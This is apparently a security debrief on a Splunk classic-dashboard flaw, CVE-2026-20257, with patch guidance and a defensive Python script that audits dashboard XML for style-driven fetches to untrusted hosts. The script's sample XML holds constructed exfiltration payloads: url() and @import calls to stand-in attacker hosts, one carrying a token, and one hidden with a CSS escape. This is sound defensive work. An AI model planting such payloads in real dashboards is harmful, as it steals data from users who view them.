PatchSiren cyber security CVE debrief
CVE-2026-20257 Splunk CVE debrief
A vulnerability was found in Splunk Enterprise and Splunk Cloud Platform. A low-privileged user could craft a classic dashboard that exfiltrates sensitive data from the browser of a higher-privileged user who views it. This is possible because classic dashboard panels do not fully validate style attribute values, allowing requests to reach external domains outside the configured Trusted Domains List.
- Vendor: Splunk
- Product: Splunk Enterprise
- CVSS: MEDIUM 5.7
- CISA KEV: Not listed in stored evidence
- Original CVE published: 2026-06-10
- Original CVE updated: 2026-06-10
- Advisory published: 2026-06-10
- Advisory updated: 2026-06-10
Who should care
Administrators and users of Splunk Enterprise versions below 10.2.4, 10.0.7, 9.4.12, and 9.3.13, and Splunk Cloud Platform versions below 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, and 9.3.2411.132.
Technical summary
Exploitation needs two parties: a low-privileged user who can create or edit a classic dashboard, and a higher-privileged user who is lured into opening it. Because classic dashboard panels do not fully validate style attribute values, the attacker's panel can make the victim's browser issue requests to a domain that is not on the Trusted Domains List, and data available in that victim's session can be carried out in those requests. The attacker cannot trigger the leak on their own: the victim must view the crafted dashboard, which is why the attack is phishing-dependent and rated MEDIUM with a CVSS base score of 5.7.
Defensive priority
MEDIUM
Recommended defensive actions
- Update Splunk Enterprise to 10.2.4, 10.0.7, 9.4.12, or 9.3.13, or a later release in the same line.
- Update Splunk Cloud Platform to 10.3.2512.13, 10.2.2510.15, 10.1.2507.23, or 9.3.2411.132, or a later release in the same line.
- Restrict who can create or edit classic dashboards to trusted users, since the attacker only needs a low-privileged account with that ability.
- Keep the Trusted Domains List limited to the external domains dashboards actually need; every entry on it is a host a viewer's browser may be sent to.
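As an added illustration of the mechanism described above (this is not Splunk's code, and not a claim about which style values the vendor fix validates): a small audit script that scans exported classic dashboard XML for inline style attributes and style blocks whose url() or @import targets point at hosts outside a trusted-domain allowlist. The dashboard XML, the hostnames, and the allowlist semantics (exact or subdomain match) are constructed assumptions; Splunk's own Trusted Domains List format is not reproduced.

```python
"""Audit classic dashboard XML for CSS fetch targets outside an allowlist.

Added illustration, not Splunk's code. Assumptions (labelled): the dashboard
XML below is constructed; TRUSTED_DOMAINS is a plain set of hostnames with
exact-or-subdomain matching, not Splunk's actual Trusted Domains List
representation; url() and @import are treated as the generic CSS fetch vectors.
"""
import html
import re
from urllib.parse import urlparse

# Constructed sample: one benign panel and three exfiltration attempts
# (bare url(), @import, and a CSS-escaped "\75rl(" that spells url()).
SAMPLE_DASHBOARD_XML = r"""<dashboard>
  <label>Ops overview</label>
  <row>
    <panel><html>
      <div style="background-image: url('https://assets.corp.example/logo.png')">Logo</div>
    </html></panel>
    <panel><html>
      <div style="background:url(https://collector.attacker.example/x?d=$token$);color:red">x</div>
    </html></panel>
    <panel><html>
      <style>@import url("//cdn.attacker.example/t.css");</style>
    </html></panel>
    <panel><html>
      <div style='background:\75rl(https://exfil.attacker.example/p)'>y</div>
    </html></panel>
  </row>
</dashboard>
"""

# Hypothetical allowlist standing in for the configured Trusted Domains List.
TRUSTED_DOMAINS = {"assets.corp.example", "splunk.corp.example"}

# Inline style attributes (double- or single-quoted) and <style> element bodies.
STYLE_ATTR_RE = re.compile(r"""\bstyle\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.I)
STYLE_TAG_RE = re.compile(r"<style\b[^>]*>(.*?)</style>", re.I | re.S)
# url(...) with optional quotes, plus @import "x" / @import 'x' without url().
URL_RE = re.compile(r"""url\(\s*(?:"([^"]*)"|'([^']*)'|([^)"'\s]*))\s*\)""", re.I)
IMPORT_RE = re.compile(r"""@import\s+(?:"([^"]*)"|'([^']*)')""", re.I)
# CSS backslash escapes: \XX hex (optionally followed by one whitespace) or \c.
CSS_ESCAPE_RE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.S)


def css_unescape(value):
    """Decode CSS escapes so an obfuscated token such as \\75rl( is seen as url(."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return m.group(2)
    return CSS_ESCAPE_RE.sub(repl, value)


def style_fragments(doc):
    """Yield every CSS fragment a browser would evaluate from the markup."""
    for m in STYLE_ATTR_RE.finditer(doc):
        yield m.group(1) if m.group(1) is not None else m.group(2)
    for m in STYLE_TAG_RE.finditer(doc):
        yield m.group(1)


def fetch_targets(css):
    """Return every URL a CSS fragment would make the browser request."""
    css = css_unescape(css)
    targets = [next(g for g in m.groups() if g is not None) for m in URL_RE.finditer(css)]
    targets += [m.group(1) if m.group(1) is not None else m.group(2)
                for m in IMPORT_RE.finditer(css)]
    return targets


def is_trusted(host, trusted):
    """Exact or subdomain match against the allowlist (assumed semantics)."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in trusted)


def find_untrusted_style_refs(xml_text, trusted):
    """Return [(url, host)] for each style-driven fetch whose host is not allowlisted.
    Relative and data: URLs carry no host and are skipped (same-origin)."""
    doc = html.unescape(xml_text)  # panel HTML may be entity-encoded inside the XML
    findings = []
    for css in style_fragments(doc):
        for url in fetch_targets(css):
            host = urlparse(url.strip()).hostname
            if host and not is_trusted(host, trusted):
                findings.append((url, host))
    return findings


if __name__ == "__main__":
    for url, host in find_untrusted_style_refs(SAMPLE_DASHBOARD_XML, TRUSTED_DOMAINS):
        print(f"untrusted style fetch -> {host}: {url}")
```

Run it against the XML of dashboards in your environment (for example the views exported from an app's data/ui/views directory); every hit names a host a viewer's browser would be sent to when the panel renders. The escape decoding matters: `\75rl(` renders as `url(` in the browser and would slip past a plain substring check for `url(`, and protocol-relative `//host/...` references are resolved to a host just like absolute ones.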
Evidence notes
The CVE record was published on June 10, 2026, and last modified on June 10, 2026.
Official resources
- CVE-2026-20257 CVE record (CVE.org)
- CVE-2026-20257 NVD detail (NVD)
- Source item URL: nvd_modified
- Source reference: CVE-2026-20257 was published on 2026-06-10T18:16:41.257Z.